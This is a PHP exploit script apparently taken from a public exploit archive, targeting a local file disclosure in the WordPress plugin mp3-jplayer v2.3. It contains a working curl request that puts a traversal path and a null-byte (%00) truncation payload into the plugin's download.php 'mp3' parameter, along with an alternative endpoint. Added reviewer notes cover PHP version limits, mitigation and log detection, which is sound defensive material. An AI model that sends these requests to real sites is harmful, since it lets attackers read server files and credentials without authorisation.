<?php
# > D_x . Made In Algeria . x_Z <<
# ###########################################
#
# [>] Title : WordPress plugin (mp3-jplayer v2.3) Local File Disclosure
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://mp3-jplayer.com
#
# ###########################################
#
# [!] Description :
#
# WordPress plugin mp3-jplayer v2.3 suffers from a local file disclosure:
# a remote attacker can download/disclose files from the root path.
#
# Reviewer notes (defensive reading of the request below):
#   * The file to be served is named by the `mp3` query parameter of the
#     plugin's download script; the value is followed by a URL-encoded NUL
#     byte (%00) and an audio extension.
#     NOTE(review): this presumably defeats an extension check by truncating
#     the path at the NUL when the file is opened -- confirm against the
#     plugin source, which this page does not show.
#   * PHP 5.3.4 and later reject filesystem paths that contain a NUL byte,
#     so the %00 part only matters on older runtimes; the missing path
#     validation in the plugin is still the defect to fix.
#   * Mitigation: move to a plugin release the vendor lists as fixed
#     (<FIXED_VERSION -- not stated on this page>), or remove the plugin.
#     A download handler should resolve the requested path and serve it only
#     if it lies inside the media directory.
#   * Detection: review web access logs for requests to the plugin's
#     download.php / remote/downloader.php whose `mp3` value contains %00 or
#     does not point into the media library.
#
# ExpLO!T :
# -------
#
# Sends one GET request. [Target] and [ LFI ] are the author's placeholders.
# CURLOPT_RETURNTRANSFER is not set, so curl_exec() writes the response body
# straight to output and returns a boolean; the final echo prints that boolean.
$ch = curl_init();
curl_setopt_array($ch, array(
    CURLOPT_URL       => "http://[Target]/wp-content/plugins/mp3-jplayer/download.php?mp3=[ LFI ]%00.mp3",
    # or ../remote/downloader.php?mp3=[ LFI ]%00.ogg
    CURLOPT_HTTPGET   => 1,
    CURLOPT_USERAGENT => "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
    CURLOPT_TIMEOUT   => 0, # 0 = no overall timeout
));
$response = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $response;
####
#
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-mp3-jplayer-v23-local.html
?>